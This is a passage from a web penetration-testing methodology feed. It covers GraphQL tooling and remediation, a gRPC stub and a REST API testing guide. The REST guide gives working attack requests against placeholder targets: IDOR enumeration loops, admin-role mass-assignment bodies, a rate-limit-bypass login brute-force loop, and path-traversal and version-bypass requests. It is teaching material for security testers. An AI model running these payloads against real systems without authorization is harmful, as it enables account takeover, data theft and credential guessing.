style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ renderEmail(template: \&#34;{{7*7}}\&#34;) { output } }&#34;</span><span style="color:#f92672">}</span> </span></span></code></pre></div><hr> <h2 id="tools">Tools</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># GraphQL Voyager — visual schema explorer:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Load introspection result → visual graph of all types/relations</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># InQL — Burp Suite extension (essential):</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># BApp Store → InQL</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Auto-generates query templates from introspection</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Batch attack mode</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># graphw00f — GraphQL engine fingerprinting:</span> </span></span><span style="display:flex;"><span>git clone https://github.com/dolevf/graphw00f </span></span><span style="display:flex;"><span>python3 graphw00f.py -t https://target.com/graphql </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># clairvoyance — schema recovery without introspection:</span> </span></span><span style="display:flex;"><span>git clone https://github.com/nikitastupin/clairvoyance </span></span><span style="display:flex;"><span>python3 -m clairvoyance -u https://target.com/graphql -w wordlist.txt </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># GraphQL cop — security audit tool:</span> </span></span><span style="display:flex;"><span>pip3 install graphql-cop </span></span><span style="display:flex;"><span>graphql-cop -t https://target.com/graphql </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Dump full schema via introspection:</span> </span></span><span style="display:flex;"><span>python3 -c <span style="color:#e6db74">&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">import requests, json </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">r = requests.post(&#39;https://target.com/graphql&#39;, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> json={&#39;query&#39;: open(&#39;introspection_query.graphql&#39;).read()}, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> headers={&#39;Authorization&#39;: &#39;Bearer TOKEN&#39;}) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">print(json.dumps(r.json(), indent=2)) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># graphql-path-enum — enumerate hidden paths:</span> </span></span><span style="display:flex;"><span>git clone https://github.com/nicowillis/graphql-path-enum </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># curl quick tests:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Check introspection:</span> </span></span><span style="display:flex;"><span>curl -s -X POST https://target.com/graphql <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;query&#34;:&#34;{__schema{types{name}}}&#34;}&#39;</span> | jq <span style="color:#e6db74">&#39;.data.__schema.types[].name&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># List all queries:</span> </span></span><span style="display:flex;"><span>curl -s -X POST https://target.com/graphql <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;query&#34;:&#34;{__schema{queryType{fields{name}}}}&#34;}&#39;</span> | jq <span style="color:#e6db74">&#39;.data.__schema.queryType.fields[].name&#39;</span> </span></span></code></pre></div><hr> <h2 id="remediation-reference">Remediation Reference</h2> <ul> <li><strong>Disable introspection in production</strong>: configure server to block <code>__schema</code> and <code>__type</code> queries</li> <li><strong>Query depth limiting</strong>: max 5–10 levels; reject deeper queries</li> <li><strong>Query complexity limits</strong>: assign cost to each field, reject queries above threshold</li> <li><strong>Rate limiting per operation</strong>: limit both batched arrays and aliased queries</li> <li><strong>Authorization at resolver level</strong>: check permissions on every resolver, not just entry point</li> <li><strong>Persistent query allowlisting</strong>: only accept pre-registered query hashes in production</li> <li><strong>Disable batching</strong> if not required by the client application</li> <li><strong>Input validation</strong>: treat GraphQL args as untrusted input (prevent SQL/NoSQL/CMDi injection)</li> </ul> <p><em>Part of the Web Application Penetration Testing Methodology series.</em></p> gRPC Security Testing https://az0th.it/web/api/112-api-grpc/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/api/112-api-grpc/ <h1 id="grpc-security-testing">gRPC Security Testing</h1> <blockquote> <p><strong>Severity</strong>: High | <strong>CWE</strong>: CWE-284, CWE-20 <strong>OWASP</strong>: A01:2021 – Broken Access Control | A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-grpc">What Is gRPC?</h2> <p>gRPC is Google&rsquo;s Remote Procedure Call framework using HTTP/2 as transport and Protocol Buffers (protobuf) as the serialization format. Unlike REST, gRPC uses a binary wire format and requires a <code>.proto</code> schema definition. The attack surface differs significantly from REST APIs:</p> <ul> <li>Binary encoding obscures payloads from passive inspection</li> <li>gRPC reflection (server-side schema discovery) often left enabled in production</li> <li>Authentication is per-connection or per-call via metadata headers</li> <li>Four communication patterns: unary, server-streaming, client-streaming, bidirectional streaming</li> <li>gRPC-Web is a browser-compatible variant proxied through HTTP/1.1 or HTTP/2</li> </ul> <pre tabindex="0"><code>gRPC attack surface: gRPC Reflection → full service/method enumeration (like introspection in GraphQL) Metadata headers → auth bypass (incorrect header parsing, case sensitivity) Protobuf fuzzing → buffer overflow, type confusion in custom parsers Authorization on service vs method level → method-level bypass gRPC-Web proxy → HTTP/1.1 wrapper enables Burp interception without plugin </code></pre><hr> <h2 id="discovery-checklist">Discovery Checklist</h2> <p><strong>Phase 1 — Service Discovery</strong></p> REST API Security Testing https://az0th.it/web/api/110-api-rest/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/api/110-api-rest/ <h1 id="rest-api-security-testing">REST API Security Testing</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-284, CWE-285, CWE-200 <strong>OWASP API Top 10</strong>: API1–API10</p> </blockquote> <hr> <h2 id="what-is-rest-api-security-testing">What Is REST API Security Testing?</h2> <p>REST APIs expose application logic directly — often with less protection than web UIs. The OWASP API Security Top 10 defines the primary attack vectors: Broken Object Level Authorization (BOLA/IDOR), Broken Authentication, Broken Object Property Level Authorization (Mass Assignment), Rate Limiting bypass, and more.</p> <pre tabindex="0"><code>REST API attack surface vs web UI: - No session cookie → token-based auth → different bypass techniques - Machine-readable responses → easier automated enumeration - Versioned endpoints (/v1, /v2) → old versions may lack controls - Documentation endpoints (/swagger, /openapi.json) → reveals all endpoints - Often less WAF/filtering than web UI </code></pre><hr> <h2 id="discovery-checklist">Discovery Checklist</h2> <ul> <li><input disabled="" type="checkbox"> Find API documentation: <code>/swagger-ui</code>, <code>/openapi.json</code>, <code>/api-docs</code>, <code>/redoc</code>, <code>/graphql</code></li> <li><input disabled="" type="checkbox"> Enumerate versioned endpoints: <code>/v1/</code>, <code>/v2/</code>, <code>/api/v1/</code>, <code>/api/v2/</code></li> <li><input disabled="" type="checkbox"> Check for shadow/zombie endpoints (old versions still accessible)</li> <li><input disabled="" type="checkbox"> Test BOLA on all object IDs (numeric, UUID, base64)</li> <li><input disabled="" type="checkbox"> Test HTTP method override: GET→DELETE, GET→PUT via <code>X-HTTP-Method-Override</code></li> <li><input disabled="" type="checkbox"> Test mass assignment in PUT/PATCH bodies (add admin/role fields)</li> <li><input disabled="" type="checkbox"> Test authentication header bypass: missing, invalid, expired tokens</li> <li><input disabled="" type="checkbox"> Test rate limiting: login, OTP, search, expensive operations</li> <li><input disabled="" type="checkbox"> Test JWT-specific attacks (see 28_JWT.md)</li> <li><input disabled="" type="checkbox"> Check CORS on API: does it reflect Origin with <code>Access-Control-Allow-Credentials: true</code>?</li> <li><input disabled="" type="checkbox"> Test for verbose error messages revealing internals</li> <li><input disabled="" type="checkbox"> Test file upload endpoints (see 24_FileUpload.md)</li> <li><input disabled="" type="checkbox"> Check pagination: does negative/zero offset reveal unintended data?</li> </ul> <hr> <h2 id="payload-library">Payload Library</h2> <h3 id="attack-1--bola--broken-object-level-authorization">Attack 1 — BOLA / Broken Object Level Authorization</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Basic IDOR: change your ID to someone else&#39;s</span> </span></span><span style="display:flex;"><span>GET /api/v1/users/MY_ID/profile → <span style="color:#ae81ff">200</span> OK <span style="color:#f92672">(</span>your data<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span>GET /api/v1/users/1/profile → should be 403, but... </span></span><span style="display:flex;"><span>GET /api/v1/users/ADMIN_ID/profile → cross-account access? </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Systematic enumeration:</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> id in <span style="color:#66d9ef">$(</span>seq <span style="color:#ae81ff">1</span> 100<span style="color:#66d9ef">)</span>; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> status<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>curl -so /dev/null -w <span style="color:#e6db74">&#34;%{http_code}&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;https://api.target.com/v1/users/</span>$id<span style="color:#e6db74">/profile&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span><span style="color:#66d9ef">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;User </span>$id<span style="color:#e6db74">: </span>$status<span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># UUID enumeration — less guessable but still test:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Find UUIDs in responses, increment/fuzz them</span> </span></span><span style="display:flex;"><span>curl https://api.target.com/v1/orders/6ba7b810-9dad-11d1-80b4-00c04fd430c8 <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer ANOTHER_USER_TOKEN&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Object type substitution:</span> </span></span><span style="display:flex;"><span>GET /api/orders/1234 → your order </span></span><span style="display:flex;"><span>GET /api/invoices/1234 → same ID, different resource type </span></span><span style="display:flex;"><span>GET /api/admin/users/1234 → horizontal → vertical escalation </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Nested resource BOLA:</span> </span></span><span style="display:flex;"><span>GET /api/users/VICTIM_ID/addresses <span style="color:#75715e"># victim&#39;s addresses</span> </span></span><span style="display:flex;"><span>GET /api/users/VICTIM_ID/payment-methods <span style="color:#75715e"># victim&#39;s payment methods</span> </span></span><span style="display:flex;"><span>GET /api/users/VICTIM_ID/orders <span style="color:#75715e"># victim&#39;s order history</span> </span></span></code></pre></div><h3 id="attack-2--broken-function-level-authorization-bfla">Attack 2 — Broken Function Level Authorization (BFLA)</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Test accessing admin-only endpoints with regular user token:</span> </span></span><span style="display:flex;"><span>GET /api/v1/admin/users → list all users </span></span><span style="display:flex;"><span>POST /api/v1/admin/users/1/promote → promote to admin </span></span><span style="display:flex;"><span>DELETE /api/v1/users/VICTIM_ID → delete another user </span></span><span style="display:flex;"><span>GET /api/v1/reports/financial → financial data </span></span><span style="display:flex;"><span>POST /api/v1/system/config → system configuration </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># HTTP method confusion:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># App only protects POST /resource but not PUT, PATCH, DELETE</span> </span></span><span style="display:flex;"><span>GET /api/v1/admin/settings → <span style="color:#ae81ff">403</span> </span></span><span style="display:flex;"><span>POST /api/v1/admin/settings → <span style="color:#ae81ff">403</span> </span></span><span style="display:flex;"><span>PUT /api/v1/admin/settings → 200? <span style="color:#f92672">(</span>missing protection<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Path traversal in API:</span> </span></span><span style="display:flex;"><span>GET /api/v1/users/me/../admin/users → path confusion </span></span><span style="display:flex;"><span>GET /api/v1/../admin/settings → skip auth prefix </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Version bypass:</span> </span></span><span style="display:flex;"><span>GET /api/v2/admin/users → <span style="color:#ae81ff">403</span> </span></span><span style="display:flex;"><span>GET /api/v1/admin/users → <span style="color:#ae81ff">200</span> <span style="color:#f92672">(</span>old version unprotected<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span>GET /v1/admin/users → different path, same backend </span></span></code></pre></div><h3 id="attack-3--mass-assignment">Attack 3 — Mass Assignment</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Find: what fields does the server accept?</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># PUT /api/v1/users/me with extra fields:</span> </span></span><span style="display:flex;"><span>curl -X PUT https://api.target.com/v1/users/me <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer TOKEN&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{ </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;name&#34;: &#34;Test User&#34;, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;email&#34;: &#34;test@test.com&#34;, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;role&#34;: &#34;admin&#34;, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;isAdmin&#34;: true, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;verified&#34;: true, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;credits&#34;: 99999, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;subscription&#34;: &#34;enterprise&#34;, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;permissions&#34;: [&#34;read&#34;, &#34;write&#34;, &#34;delete&#34;, &#34;admin&#34;] </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> }&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># PATCH — partial update often even less protected:</span> </span></span><span style="display:flex;"><span>curl -X PATCH https://api.target.com/v1/users/me <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer TOKEN&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;role&#34;: &#34;admin&#34;}&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Nested mass assignment:</span> </span></span><span style="display:flex;"><span>curl -X PUT https://api.target.com/v1/products/123 <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;price&#34;: 0.01, &#34;discount&#34;: 100, &#34;internal&#34;: {&#34;cost&#34;: 0}}&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Registration mass assignment:</span> </span></span><span style="display:flex;"><span>curl -X POST https://api.target.com/v1/register <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{ </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;username&#34;: &#34;attacker&#34;, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;password&#34;: &#34;pass&#34;, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;isAdmin&#34;: true, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;emailVerified&#34;: true, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;betaAccess&#34;: true </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> }&#39;</span> </span></span></code></pre></div><h3 id="attack-4--rate-limit-bypass">Attack 4 — Rate Limit Bypass</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Header-based IP rotation (X-Forwarded-For etc.):</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> ip in <span style="color:#66d9ef">$(</span>seq <span style="color:#ae81ff">1</span> <span style="color:#ae81ff">50</span> | xargs -I<span style="color:#f92672">{}</span> echo <span style="color:#e6db74">&#34;192.168.1.{}&#34;</span><span style="color:#66d9ef">)</span>; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> curl -s -X POST https://api.target.com/v1/auth/login <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;X-Forwarded-For: </span>$ip<span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;email&#34;:&#34;admin@corp.com&#34;,&#34;password&#34;:&#34;test&#34;}&#39;</span> &amp; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span>wait </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Rate limit per endpoint but not per action:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Endpoint A limits to 10/min, Endpoint B has no limit</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># But both write to same counter → abuse endpoint B</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Null byte bypass (some parsers treat as request boundary):</span> </span></span><span style="display:flex;"><span>POST /api/login HTTP/1.1 </span></span><span style="display:flex;"><span>email<span style="color:#f92672">=</span>admin@corp.com%00&amp;password<span style="color:#f92672">=</span>test </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Content-Type variation:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Rate limit checks JSON Content-Type only → bypass with form-encoded:</span> </span></span><span style="display:flex;"><span>curl -X POST https://api.target.com/v1/otp/verify <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/x-www-form-urlencoded&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#34;otp=123456&#34;</span> <span style="color:#75715e"># instead of JSON</span> </span></span></code></pre></div><h3 id="attack-5--api-key--token-testing">Attack 5 — API Key / Token Testing</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Find API keys in:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># JS files, Git history, mobile app decompiled code, documentation</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test API key scope escalation:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># My key: read-only → try write operations</span> </span></span><span style="display:flex;"><span>curl -X DELETE https://api.target.com/v1/users/1337 <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;X-API-Key: MY_READ_ONLY_KEY&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># API key in URL → leaks in Referer, logs:</span> </span></span><span style="display:flex;"><span>curl <span style="color:#e6db74">&#34;https://api.target.com/v1/data?api_key=SECRET_KEY&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># More secure: Authorization: ApiKey SECRET_KEY</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test: does API accept both header and URL param key?</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># → URL param is logged in server access logs → harvest from logs</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Key rotation bypass (old keys still valid?):</span> </span></span><span style="display:flex;"><span>curl https://api.target.com/v1/me <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer OLD_TOKEN&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># JWT-based API auth → see 28_JWT.md for full attack tree</span> </span></span></code></pre></div><h3 id="attack-6--excessive-data-exposure">Attack 6 — Excessive Data Exposure</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># API returns more data than UI shows:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># UI shows: name, email</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># API returns: name, email, phone, dob, ssn, password_hash, internal_id</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>curl -s https://api.target.com/v1/users/me <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer TOKEN&#34;</span> | python3 -m json.tool </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Nested object exposure:</span> </span></span><span style="display:flex;"><span>curl -s https://api.target.com/v1/products/1 | python3 -m json.tool </span></span><span style="display:flex;"><span><span style="color:#75715e"># → {&#34;name&#34;:&#34;Widget&#34;,&#34;price&#34;:9.99,&#34;internal&#34;:{&#34;cost&#34;:0.50,&#34;supplier_id&#34;:42}}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Admin fields in regular user response:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Look for: isAdmin, role, permissions, internal_notes, createdBy, updatedAt</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Batch API — get all users&#39; data:</span> </span></span><span style="display:flex;"><span>POST /api/graphql <span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ users { nodes { id email passwordHash } } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Or:</span> </span></span><span style="display:flex;"><span>GET /api/v1/users?page<span style="color:#f92672">=</span>1&amp;per_page<span style="color:#f92672">=</span><span style="color:#ae81ff">10000</span> <span style="color:#75715e"># pagination abuse</span> </span></span></code></pre></div><h3 id="attack-7--shadow--zombie-endpoint-discovery">Attack 7 — Shadow / Zombie Endpoint Discovery</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Enumerate API versions:</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> v in v1 v2 v3 v4 v0 beta alpha internal; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> status<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>curl -so /dev/null -w <span style="color:#e6db74">&#34;%{http_code}&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;https://api.target.com/</span>$v<span style="color:#e6db74">/users&#34;</span><span style="color:#66d9ef">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;/</span>$v<span style="color:#e6db74">/users: </span>$status<span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Check Swagger/OpenAPI docs:</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> path in swagger-ui swagger-ui.html api-docs openapi.json <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> swagger.json swagger.yaml redoc v1/swagger.json; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> curl -si <span style="color:#e6db74">&#34;https://target.com/</span>$path<span style="color:#e6db74">&#34;</span> | head -3 </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Find API from JS bundles:</span> </span></span><span style="display:flex;"><span>grep -rn <span style="color:#e6db74">&#34;api/v\|endpoint\|baseURL\|apiUrl&#34;</span> --include<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;*.js&#34;</span> . | <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> grep -v <span style="color:#e6db74">&#34;node_modules&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Wayback Machine for old API endpoints:</span> </span></span><span style="display:flex;"><span>waybackurls api.target.com | grep -E <span style="color:#e6db74">&#34;/api/v[0-9]&#34;</span> | sort -u </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># ffuf with API wordlist:</span> </span></span><span style="display:flex;"><span>ffuf -u https://api.target.com/FUZZ <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -mc 200,201,204,301,302,403 -o api_endpoints.json </span></span></code></pre></div><hr> <h2 id="tools">Tools</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Burp Suite:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Proxy: capture all API traffic</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Repeater: manual BOLA/BFLA testing</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Scanner: automated IDOR detection</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Extensions: Autorize (BOLA), AuthMatrix (BFLA), Param Miner</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># mitmproxy — API traffic interception:</span> </span></span><span style="display:flex;"><span>mitmproxy --mode transparent --ssl-insecure </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Postman / Insomnia — API testing:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Import Swagger/OpenAPI spec → test all endpoints</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># REST-assured (Java) — automated API testing framework</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># jwt_tool — JWT analysis (see 28_JWT.md):</span> </span></span><span style="display:flex;"><span>python3 jwt_tool.py TOKEN -t </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># ffuf — API endpoint fuzzing:</span> </span></span><span style="display:flex;"><span>ffuf -u <span style="color:#e6db74">&#34;https://api.target.com/v1/FUZZ&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer TOKEN&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Autorize (Burp extension):</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Automatic BOLA testing — replays every request with low-priv token</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># and compares responses</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 403 bypass techniques:</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> h in <span 